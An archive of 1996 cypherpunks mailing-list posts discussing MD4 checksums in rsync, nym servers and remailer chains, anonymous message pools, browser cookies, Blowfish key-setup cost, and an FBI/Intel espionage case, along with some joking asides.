>Damnit, Perry, the fact that you don't like them doesn't mean we
>should outlaw them!  :)
>
>Adam
>
>Perry E. Metzger wrote:
>| vinnie moscaritolo writes:
>| > >>>Mr Brooks, the piper, 
             (...)
>| > >>>claims he wasn't playing a musical
>| > >>>instrument, but practising with a weapon!
>| > >>>
>| > >>>The imagination boggles if his claim is successful!
>| 
>| No one who has heard sustained bagpipe playing can deny the fact that
>| bagpipes are indeed an instrument of war, with no legitimate place in
>| peaceful everyday society.
>| 
>| Perry

Of course...when bagpipes are outlawed...
--

Michael Myers                   Vote Libertarian....you'll sleep better!
Don't like abortion? Don't have one.     Don't like guns? Don't buy one.
|                 Don't like bagpipes? Don't play one!                 |
blackavr@aa.net                          E-mail for PGPv2.6.2 public key
\____________ http://www.aa.net/~blackavr/homepage.htm ________________/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 30 Jun 1996 03:37:29 +0800
To: Andrew.Tridgell@anu.edu.au
Subject: Re: rsync and md4
In-Reply-To: <96Jun29.135037+1000est.65075-20848+164@arvidsjaur.anu.edu.au>
Message-ID: <Pine.LNX.3.94.960629131422.197A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 29 Jun 1996, Andrew Tridgell wrote:

> I've recently released a package called rsync that uses a checksum
> search to provide very efficient file update over a slow link.  (see
> ftp://samba.anu.edu.au/pub/rsync if you are interested)
> 
> Now I'd like to calculate some probabilities of failure of the
> algorithm. The fundamental thing I need to know to do the calculation
> is the probability of a random piece of data of length n having the
> same md4 checksum as another given piece of data of the same length.

MD4 is a hashing algorithm, but it can be used for checksuming.

> 
> A first guess might be 2^-128 but I know that this sort of thing is
> rarely that simple. Is md4 that good?

2^-64.
> 
> Note that I am not interested in "attacks" on md4 as such as the
> source of the random data is just another file provided by the same
> user, so it won't have been specially designed to defeat md4. 
> 
> If the probability is within a few orders of magnitude of 2^-128 then
> can I also be sure that if I only use the first b bits of a md4
> checksum it will be within a few orders of magnitude of 2^-b ? There
> is an option in rsync to use a shorter checksum by truncating
> md4. This saves some bytes on the link at the risk of lowering the
> confidence. 

The probability of failure is 2^-(b/2).

> 
> Why md4? I chose md4 because it seemed to be the fastest of the
> reputedly strong, publicly available checksum algorithms. Suggestions
> for alternative algorithms are welcome.

So far, MD4 is the fastest hashing algorithm.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdVlv7Zc+sv5siulAQG0SAP9HyybTTn/ffPLhPgtooxP/abIQYZ2r6sI
PW90ilTucWMNjFQ87Xl+MUUysklG4G1zx+i3ZnIP5ud3D69kh+E6s2MbvUKcOFUi
TKAmB5rVSGHOvDROnY5cBGU7iSCxgiM5auq5rSu6/MvwtvSf99VtKh9UdcFp2SuH
u4ukZmAE1x0=
=otP1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nCognito@rigel.cyberpass.net (Anonymous)
Date: Sun, 30 Jun 1996 07:30:13 +0800
To: cypherpunks@toad.com
Subject: Re: nym.alias.net
In-Reply-To: <199606281309.PAA13151@basement.replay.com>
Message-ID: <199606292026.NAA08528@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jun 1996, Anonymous wrote:

> I would appreciate any information members may have regarding the 
> security/safety of the new nym server nym.alias.net (in "alpha" state) 
> who posted here about 3 weeks ago. Nym.alias.net reportedly is the same 
> machine as anon.lcs.mit.edu.
> 
> Specifically, is the individual running the nym _known_ to cypherpunks, 
> or is this an unknown about whom I should have serious doubts. The admin 
> states that nym.alias.net is the same machine as anon.lcs.mit.edu. 
> 
> Any information or insight regarding the wisdom of using ths nym would 
> be welcome.
> 
> Information concerning the nym I obtained by sending a message to 
> help@nym.alias.net; the administrator can be reached at 
> admin@nym.alias.net. 

Yes, nym.alias.net is anon.lcs.mit.edu.  As for whether the operator is 
trust-worthy, this is really a pointless question. With a properly 
implemented nym, the NSA themselves could be the host of your nym, and 
they still couldn't connect your nym to your true email address.

All that is required is that at least ONE of the remailers in your reply 
chain be trustworthy. 

The nym server stores only a list of nym's and the associated 
reply-blocks. Your reply block should have an absolute minimum of 2 hops, 
and each hop should be seperately encrypted with the key of the 
particular remailer. In this manner, even a corrupt nymserver would only 
be able to discern that a particular nym was using remailer X as its 
first hop. The eventual destination would be encrypted with the other 
remailer's key.  In order to compromise your nym, an attacker would need 
to compromise not only the nym server, but also all of the other 
remailers in your chain.

Persons sending mail to your nym should also use a chain of remailer's, 
if you are concerned that the nym server is interested in who is sending 
mail to which nym.

It may be helpful to have a seperate public/private PGP keypair for your 
nym, which is available for those wishing to send mail to your nym. 
Encrypting all trafic across the nymserver would protect the contents 
from eavesdropping, even if the nymserver has been compromised.




Ciao..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 29 Jun 1996 21:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: www hacking?
In-Reply-To: <960629011631_145401493@emout08.mail.aol.com>
Message-ID: <Pine.HPP.3.91.960629125936.8634A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jun 1996 AwakenToMe@aol.com wrote:

> If someone could tell me the dangers of someone attacking someones
> site..etc..on the WWW, I would much appreciate it!

Editing the contents of a .htm(l) without permission of the owner
(alledged publisher) can do any sort of harm. Imagine the reaction
if the Vatican Home Page suddenly contained a statement like 'Woytola
just spoke to God. The Allmighty has changed her mind: Contraception
and Divorce are hereby sanctioned by the Divine Catholic Throne'.

Even changing a single ascii character can raise HELL. The biggest
telco in Sweden, TELIA (formerly the State Monopoly and still
a subject for 2600-type teenager scorn) recently involuntarily
had their main home-page logo changed to FELIA - which in Swedish
is an allegory of 'wrong', as if PACIFIC BELL would have become
PACIFIC HELL. This was major news for all media including prime
time TV and very bad publicity for the telco, securitywize.


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Tridgell <tridge@arvidsjaur.anu.edu.au>
Date: Sat, 29 Jun 1996 14:45:31 +0800
To: cypherpunks@toad.com
Subject: rsync and md4
Message-ID: <96Jun29.135037+1000est.65075-20848+164@arvidsjaur.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


I've recently released a package called rsync that uses a checksum
search to provide very efficient file update over a slow link.  (see
ftp://samba.anu.edu.au/pub/rsync if you are interested)

Now I'd like to calculate some probabilities of failure of the
algorithm. The fundamental thing I need to know to do the calculation
is the probability of a random piece of data of length n having the
same md4 checksum as another given piece of data of the same length.

A first guess might be 2^-128 but I know that this sort of thing is
rarely that simple. Is md4 that good?

Note that I am not interested in "attacks" on md4 as such as the
source of the random data is just another file provided by the same
user, so it won't have been specially designed to defeat md4. 

If the probability is within a few orders of magnitude of 2^-128 then
can I also be sure that if I only use the first b bits of a md4
checksum it will be within a few orders of magnitude of 2^-b ? There
is an option in rsync to use a shorter checksum by truncating
md4. This saves some bytes on the link at the risk of lowering the
confidence. 

Why md4? I chose md4 because it seemed to be the fastest of the
reputedly strong, publicly available checksum algorithms. Suggestions
for alternative algorithms are welcome.

Cheers, Andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 30 Jun 1996 07:03:00 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: anonymous mailing lists
In-Reply-To: <4r3k8g$8h@abraham.cs.berkeley.edu>
Message-ID: <199606291921.OAA12444@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ian Goldberg wrote:
> 
> Also, what are the issues for people who aren't on the network?  It will
> be very hard to prevent people from noticing that they're sending a
> message to the network, or receiving one from it, so it seems the best we can
> do is to avoid letting someone be able to link incoming messages to outgoing
> ones.  A way to help this is to have a (smaller) number of nodes be the
> only ones which send mail _out_ of the network.  One idea which I'd like to
> try is having that last remailer charge postage in order to send mail out.
> After all, he is the one who will take the "heat" for the anon message,
> probably.  By concentrating the outgoing messages, it should be easier
> to do the latency and reordering tricks.
> 

Hm, I wonder what would it take to incorporate encryption straight 
into sendmail (I am talking about actually encrypting not only message
bodies, but also MAIL FROM: and RCPT TO: data). The protocol extension
would for SMTP be something like this:

A server in the welcome message may say "PGP Enhanced". If the client sees 
this substring, client (after HELO) may send command

SENDKEY

If the server answers "503 Command unrecognized", the exchange goes in the
normal way. If instead a text with 214 preceding each line gets sent 
followed by a final ".", this text is considered a PGP key for exchange.

Then usual MAIL FROM: and RCPT TO: follow, following by DATA command.
The data sent by client will be PGP encrypted. Moreover, the data may
have MAIL FROM: and RCPT TO: fields preceding any header information 
and message body. These RCPT TO: and MAIL FROM: override anything that
was supplied in clear text prior to the DATA command.

This change in protocol is relatively simple to implement and does not
require the actual sendmail to have any cryptographic subroutines.
Instead, sendmail simply calls public-key encryption programs with right
command line parameters when an encrypted message is received.

It is also possible to incorporate Latent-Time: into such messages.

What it gives to us is that a great number of systems can participate
in the more secure mail exchange. It gives clear advantages to each
site running it because now they may be exchanging may securely for 
all users.

Users of remailer network may use such PGP enhanced hosts to conceal
their usage of remailer network. It is rather obvious that when the 
number of PGP-enhanced mailers becomes large, it will be hard to tell
who is and who is not using the remailer network.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 30 Jun 1996 09:23:50 +0800
To: Michael Myers <cypherpunks@toad.com
Subject: Re: crypto and bagpipes [NOISE]
Message-ID: <199606292214.PAA15653@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 6/29/96 -0700, Michael Myers wrote:
>>Perry E. Metzger wrote:
>>| vinnie moscaritolo writes:
>>| > >>>Mr Brooks, the piper, 
>             (...)
>>| > >>>claims he wasn't playing a musical
>>| > >>>instrument, but practising with a weapon!
>>| > >>>
>>| > >>>The imagination boggles if his claim is successful!
>>| 
>>| No one who has heard sustained bagpipe playing can deny the fact that
>>| bagpipes are indeed an instrument of war, with no legitimate place in
>>| peaceful everyday society.
>>| 
>>| Perry
>
>Of course...when bagpipes are outlawed...

Do you mean the FULL-AUTO "Assault Bagpipes," the ones that produce more 
than one "toot" per blow?  Or the more "responsible" (but still dangerous!) 
semi-auto bagpipes, where you have to blow each time you want a toot.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 30 Jun 1996 10:31:55 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: fbi botches intel "ecspionage" case
Message-ID: <199606292217.PAA15773@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 PM 6/29/96 -0700, Vladimir Z. Nuri wrote:
>
>"economic espionage" (ecspionage?) is in full swing as being 
>promoted as the new bogeyman to justify spending billions of
>dollars to our intelligence agencies, both military and
>the FBI.
>we already have a very good example where this has
>backfired. I was watching Nightline on Tues night or
>so in which there was info about how the FBI helped
>get an informant into Intel in a *very* sensitive
>position, where he was able to film the pentium chip
>plans. he said he sold them, as I recall,
>to iraq, syria, china, etc.
[snip]
>I was thinking about all the objections I had to the
>FBI ecspionage treatment that were never raised on the
>program:

>1. there was an implicit assumption that merely having
>the plans to the chip would allow other countries to somehow
>slaughter us in economic competition. but INTEL has spent
>billions of dollars on physical infrastructure without which
>the plans are virtually useless. it would take other countries
>years to get the kind of equipment necessary to produce the
>pentium, by which it might actually be yesterday's technology
>that no one cares about any more.

It's worse than this.  I can recall talk of a big problem WITHIN INTEL 
trying to tranfer the process to produce a part between (as I recall) two 
Intel semiconductor fabs,  Fab IV and Fab V, which are buildings only a 
couple hundred feet apart!  And obviously, this was done with the full 
cooperation of everyone within Intel, and did not require the interfacing 
with any other company.  The idea that you can just steal the "plans" for a 
chip and build it yourself is crazy.

>2. we have a tradition of separation of church and state in
>this country, and also separation of the public government
>and private industry. suddenly we have the FBI saying they
>want to infiltrate companies to deal with economic espionage.
>well, these companies have their own policy, and what do
>they gain by having a government agency working inside them?
>in the above case I note, it led to exactly the *opposite*
>of what was intended: the theft of *highly*sensitive* plans
>by an FBI mole.

I was even more disgusted with the FBI:  I kept hearing them claim, "We did 
not authorize him to break the law."   Huh?!?  Maybe they didn't, this time, 
but does this mean, implicitly, that this country has sunk so low that the 
FBI thinks it has the legal authority to "authorize" somebody to break the 
law?????


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 30 Jun 1996 11:23:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: fbi botches intel "ecspionage" case
In-Reply-To: <199606292217.PAA15773@mail.pacifier.com>
Message-ID: <199606292231.PAA24242@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> I can recall talk of a big problem WITHIN INTEL 
>trying to tranfer the process to produce a part between (as I recall) two 
>Intel semiconductor fabs,  Fab IV and Fab V, which are buildings only a 
>couple hundred feet apart!  And obviously, this was done with the full 
>cooperation of everyone within Intel, and did not require the interfacing 
>with any other company.  The idea that you can just steal the "plans" for a 
>chip and build it yourself is crazy.

I don't quite understand your point. are you saying that a chip is
far more than merely plans? that I totally agree with.  a chip is
built by a massive army of highly intelligent people and highly
specialized equipment. I would wager that a very large part of
pentium technology is in their fabrication equipment. it would take
truckloads of files to describe all the equipment, and even
then you wouldn't necesarily be able to build it: you need the
geniuses who wrote the papers  in the first place to pull it off.

hence, one of my big criticisms of the concept of "intellectual
property": does it really exist?!?! is it in fact an oxymoron?
(don't tell the fbi!!! they'll get that weepy look that little kids
get when you tell them santa claus doesn't exist, hehehehe)

>I was even more disgusted with the FBI:  I kept hearing them claim, "We did 
>not authorize him to break the law."   Huh?!?  Maybe they didn't, this time, 
>but does this mean, implicitly, that this country has sunk so low that the 
>FBI thinks it has the legal authority to "authorize" somebody to break the 
>law?????

actually I smell something really bad here. the reporter for nightline
seemed kind of stupid to me. he kept talking about how Intel had
not gotten any warning that the employee had a criminal record and
had been involved in espionage in the past.

that was LUDICROUS. didn't he understand what was going on here? the
FBI was using this person as an INFORMANT and SPY and therefore probably did
the exact OPPOSITE: tried to use whatever leverage they could to get
him into a sensitive position where he would be USEFUL. and they
succeeded!! I find this a highly plausible scenario that they are probably
still trying to suppress.  I doubt the full truth on the matter is out
yet and a lot of people are doing the CYA thing in both Intel and
the FBI over this thing.

hence, I suspect the FBI was directly responsible for getting him
into a sensitive position where he could do damage. at least, that's
exactly what they'd be encouraging him to do. however he didn't seem
to present any evidence of that. there was some kind of finagling that
the fbi did to get him his job.

what is possible is that the FBI has *other* informants and spies working
in Intel that helped get the guy his job, and they would be "rooted out" 
if the whole story came to light. the FBI cooks up some story that makes
him look like a lone madman that went loose on his own.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 30 Jun 1996 11:56:03 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: fbi botches intel "ecspionage" case
In-Reply-To: <adfae81f08021004f81e@[205.199.118.202]>
Message-ID: <199606292247.PAA25329@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM
>I didn't see this particular "Nightline," so I can't be certain this is the
>same case I have been casually following for a couple of years. However, it
>sounds like the case of the guy who spent a year at Intel, stole some
>design tapes, went to work for AMD, offered them to AMD, had AMD refuse him
>and report his offer to Intel (the chip companies are very cooperative in
>these matters), and then proceeded on a bizarre course of offering the
>tapes to various foreign nations.

that's the guy.

>A comedy of sorts, and his "damage" was essentially meaningless.

the nightline segment certainly failed to convey that concept, but it
was what I raised in my post. in fact
it was all virtually touted as a great reason for new stringent intellectual
property laws by the reporter. "the fbi's hands are tied" he might have
even said.

>I don't recall _anything_ about him being planted by the FBI within Intel,
>nor can I imagine any circumstances in which the FBI would try this. So
>maybe I'm thinking of a different story.

probably the same one based on new elements that have just been discovered.
I missed the first half of the show but I think it was based on a new
book.

>Larry, you must not have been subscribed during the months when we debated
>this issue many times. There have also been numerous mentions of this since
>at least 1990, when I recall discussions of a change in mission for the
>NSA.

Klaus, I have seen many debates on this list and weren't what I was
talking about. this list has very little influence on public policy
as you might imagine <g>  ok, I will get flamed for that, but frankly
the public perception of cypherpunks is as a bunch of anarchists.

I mean public opinion pieces in newspapers, policy
journals, the washington talking-heads circuit like "meet the press",
etc-- but we will probably be getting that soon. except the topic
will be "what do we do about evil infoterrorists", instead of
"are evil infoterrorists a real problem". "does intellectual
property really exist, and if so what is it"  "do we actually need
new laws to create a new class of infocriminals"

>In the case I described, involving Intel and Pentium plans and a recent
>prison sentence, this was not the case. The FBI did not plant the thief.

sure sounds similar though. the guy on nightline went to brazil. maybe
that's all some juicy new info that you haven't gotten yet through 
any of your "blacknet" sources. heh heh. not too often I scoop the
ILF. <g>

>I'm sure an Alta Vista search would turn up this story. I don't plan to do
>it, though. I'm relatively certain the "Nightline" piece you cite is
>related to the case I've described. Whether "Nightline" got its wires
>crossed, or Larry did, is unknown to me.

yeah, I don't know what I'm talking about, Klaus (speaking of crossing
wires, my name is Vladimir, Vlad for short). don't understand your
fetish of calling people different names, does that have something
to do with that crypty-anarchy stuff or something? just curious.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vanished@alpha.c2.org
Date: Sun, 30 Jun 1996 13:41:40 +0800
To: cypherpunks@toad.com
Subject: Cookies anyone?
Message-ID: <199606292334.QAA20775@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


While rummaging around in my cookie jar, I found this message--along with some cookies.

:Netscape HTTP Cookie File
:# http://www.netscape.com/newsref/std/cookie_spec.html
:# This is a generated file!  Do not edit.

Rather than bring down my system by experimenting, I thought I'd ask the list, "What happens if I delete this file?" and "What happens if I delete (edit) the cookies?"

This may have been discussed before, but until now I never checked for cookies.

Thanks for your consideration of this matter.

Vanished  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@ionet.net>
Date: Sun, 30 Jun 1996 09:49:13 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: anonymous mailing lists
In-Reply-To: <199606291634.JAA28291@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.960629165335.10952B-100000@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 29 Jun 1996, Hal wrote:

> Since the PGP is run on private computers, and only at mail-reading time,
> there should be no problem entering the conventional encryption
> passphrase and checking to see whether the messages decrypt.  Actually
> PGP puts a pattern at the beginning of the encrypted portion, so
> successful decryption can be checked very quickly, without much of a
> computational load.

OK, so now I'm downloading twenty times as much anonymous mail (the original
scenario called for a 20:1 increase). Suppose for a minute that I'm doing
something really silly, like subscribing to cypherpunks through a nym (as 
some do). Now, instead of an average of sixty messages a day, I'm getting 
twelve hundred. I think my ISP might have something to say about that.

Also, who on earth would be willing to even double the load on his server 
in order to enact this? I doubt that Mr. Parekh or anyone else would do it.

Can anyone do the math as to what the quotient would have to be in order to
defy traffic analysis? It seems to me that even twenty to one would fool 
a determined attacker only for a while. After all, we're not talking 
about a very large pool. Presumably only those individuals who had a nym
on a particular server would be chosen for this mail blind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 30 Jun 1996 12:58:05 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: fbi botches intel "ecspionage" case
In-Reply-To: <199606291925.MAA12512@netcom3.netcom.com>
Message-ID: <Pine.LNX.3.93.960629170534.299B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jun 1996, Vladimir Z. Nuri wrote:

> 2. we have a tradition of separation of church and state in
> this country, and also separation of the public government
> and private industry. suddenly we have the FBI saying they

	Since when? We should, but we don't. The bigger the business, the
more likely it is to be in bed with the government.

> want to infiltrate companies to deal with economic espionage.
> well, these companies have their own policy, and what do
> they gain by having a government agency working inside them?

	It doesn't cost them anything. They are absolved from legal
problems etc.

> 3. hence, one wonders if the FBI could do a better job of
> combating ecspionage than companies are already doing, or
> if they are just going to botch it as has already been 
> spectacularly proven in this case.

	Maybe the real point isn't to combat espionage, maybe the point is
to transfer technology from those that aren't sucking up to the government
to those that are. Just a thought from the paranoid front.
 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 30 Jun 1996 14:56:26 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Crack for DOS
Message-ID: <199606300111.SAA23763@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> Blowfish is new, so perhaps there are flaws that 10-20 years of analysis
> will find.  But it's pretty good - it's small, fast in software,
> and has an annoyingly slow key-schedule which makes it difficult to
> use brute-force crackers on.  It's got variable key lengths.

This comment about "annoyingly slow" key setup made me think of pipeline
hardware to set up the keys.  Now with blowfish, key setup requires running
the Blowfish algorithm 521 times in setting up the key, so the pipeline
will require 521 stages if you want a new key for every "real" decryption. 
Ignoring chip size restrictions, this pipeline will increase the chip real
estate by 521 which will have approximately the same economic effect on the
cost of cracks as extending the key by 9 bits.

For CBC cypher systems, brute force attacks will require at least two
decryptions (one for the initialization vector, and one for the first block
of the message).  however, these decryptions can take place in parallel
(for the first block of the message) so they do not change the above
argument.  However if the design calls for more than the first block, then
the pipeline can run slower and becomes a smaller portion of the cost of
the system.

Of course if you are using Blowfish with anywhere near its full 448 bit
key, brute force attacks are simply not practical.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 30 Jun 1996 04:20:38 +0800
To: cypherpunks@toad.com
Subject: Message pools _are_ in use today!
Message-ID: <adfab86806021004c248@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:37 PM 6/29/96, Hal wrote:
>From: ichudov@algebra.com (Igor Chudov @ home)
>> A nice, albeit quite expensive, way of pretection from traffic analysis
>> is to create a mailing list (or a newsgroup) and forward all messages to
>> all users of that mailing list or newsgroup. Of course, since messages
>> are encrypted, only the recipients will be able to decrypt them.
>
>This was discussed here several years ago, under the name "anonymous
>message pools".  Myron Cuperman, the operator of the extropia remailer
>implemented one, although I don't know if it is still running (I
>haven't gotten any mail from it for years).  It was basically just a
>mailing list specifically for this purpose, that you would use as your
>anonymous return address.  Of course a problem is that there may not be
>enough people signed up to provide much privacy protection.

The newsgroup "alt.anonymous.messages" has existed for a year or two, and
serves to be working reasonably well as a message pool. Check it out.

One will find numerous messages of the sort copied below. Having browsed
some of the less common newsgroups (and trolled, in my my earlier days), I
surmise that messages to nyms like "TheBear" are related to "support and
recovery" sorts of topics. (I mention this because this is a compelling
example of where anonymity is often sought; that people are using remailers
and message pools to communicate is interesting. When Louis Freeh claims
that remailers are only being used by hackers and Russian mafia arms
exporters, this is a counterexample.)

Here's just one such message, of several I saw this morning in
"alt.anonymous.messages". (Note that anonymous message pool sorts of
messages also appear directly from time to time in groups like
"alt.abuse.recovery" and that ilk.)

--begin copied message--

From: nobody@REPLAY.COM (Anonymous)
Newsgroups: alt.anonymous.messages
Subject: TheBear
Date: 15 Jun 1996 14:26:12 +0200
Organization: Replay and Company UnLimited
Lines: 14
Sender: replay@basement.replay.com
Message-ID: <4pua54$gt6@basement.replay.com>
NNTP-Posting-Host: basement.replay.com
X-XS4ALL-Date: Sat, 15 Jun 1996 14:26:17 MET DST
XComm: Replay may or may not approve of the content of this posting
XComm: Report misuse of this automated service to <abuse@REPLAY.COM>


-----BEGIN PGP MESSAGE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

hIwDrINEDTBBpVEBA/4sKOcgI33fdk6Pz5V27OIX0KiVfb4YDwgNLDpf6Wy0uvix
4oQ9p+vmtsZ32dPBoG4aF7bvh5ejqwZSpvuKOpgt1M8SKbA+Nma+EclMzQ3us3Ey
OX5aFKo3TwB1Ck8tZPhpF8b/fI8gqz5v2FJhnon6NdktjFBVo3SBXya8AdlgUaYA
AABsOTd6WOMH8PWnKHuP7PMCflH2p+halmCDsn9ytmoG6uzrINHH/B8c7aW6c7xw
9nXbB+99xLldhAqyg1M/oKi4pjfJ8cuSonDxMPTP8rr49XTCFaiOuQ7JUe3MEaop
NIppnoBMrBvGRkKOgrYy
=lYbJ
-----END PGP MESSAGE-----

--end copied message--

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 30 Jun 1996 14:51:33 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies anyone?
In-Reply-To: <199606292334.QAA20775@infinity.c2.org>
Message-ID: <199606300159.SAA08486@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A Nym Writes:

> While rummaging around in my cookie jar, I found this message--
> along with some cookies.
> 
> :Netscape HTTP Cookie File
> :# http://www.netscape.com/newsref/std/cookie_spec.html
> :# This is a generated file!  Do not edit.
> 
> Rather than bring down my system by experimenting, I thought I'd ask the list, "What happens if I delete this file?" and "What happens if I 
> delete (edit) the cookies?"
> 
> This may have been discussed before, but until now I never checked for 
> cookies.
> 
> Thanks for your consideration of this matter.

HTTP servers are permitted to store up to 4k bytes of information of their
choice on your machine, which is returned to them upon request the next
time you access their system.

This allows the servers to maintain a client state which persists 
across separate accesses.  

Nothing will happen if you delete the file, other than that servers
will not remember information they stored on the client side during
your previous visits.  If you edit the file, which is binary, you may
possibly mess it up and choke the software that uses it. 

There are some minor privacy implications for "Cookies", but they 
have been discussed on the list before.  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 30 Jun 1996 13:12:30 +0800
To: Joseph Sokol-Margolis <joseph@genome.wi.mit.edu>
Subject: Re: secure WWW on UNsecure servers
In-Reply-To: <v03007405adfa3dc7588f@[18.157.1.107]>
Message-ID: <199606292310.TAA12274@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joseph Sokol-Margolis writes:
> > How might one arrange for these encrypted web pages residing on an
> > (unsecure) server to get decrypted only at the client's machine?
> > This should work as transparently as possible for the user;
> > except possibly for a userid/password query it should look like a
> > normal web browsing session.  For now, we can assume that the
> > decrypted web pages contain only HTML and images in .gif format.
> 
> It seems like it could be done by writing a plug-in that passed the
> encrypted page to pgp (or had it internally) and used that to decrypt it.
> The plug-in could store  the pass-phrase locally and clear when the user
> disconnected.

The "Right Way" to do what was asked is to use S/HTTP. However,
Netscape, in their wisdom, has not implemented it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sun, 30 Jun 1996 15:08:49 +0800
To: Andrew.Tridgell@anu.edu.au
Subject: Re: rsync and md4
In-Reply-To: <96Jun30.105019+1000est.65036-6357+785@arvidsjaur.anu.edu.au>
Message-ID: <Pine.BSF.3.91.960629200514.626A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> > MD4 is not strong- people can deliberately produce files with the same
> > hash in a matter of minutes. MD5 is secure for now, but it seems to be
> > gradually falling to cryptanalysis, and should be phased out of use before
> > it breaks. IMO the best hash algorithm is SHA1 (which is an updated
> > version of the original SHA). Do a web search for "FIPS PUB 180-1" for the
> > specs. 
> 
> Do you have references to the md4 collision stuff? The situation I
> have is a bit unusual so its just possible some of the results may
> apply. 

Sorry, I was actually thinking of two-pass Snerfu that can be collided in
a matter of minutes... I'm fairly certain that MD4 is collidable, but I
don't remember where I read that, and I'm not sure how much time it would
take.

I'm quite certain that MD4 will not collide by accident, so it would 
probably be okay for you.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Mon, 1 Jul 1996 15:47:27 +0800
To: Andrew.Tridgell@anu.edu.au
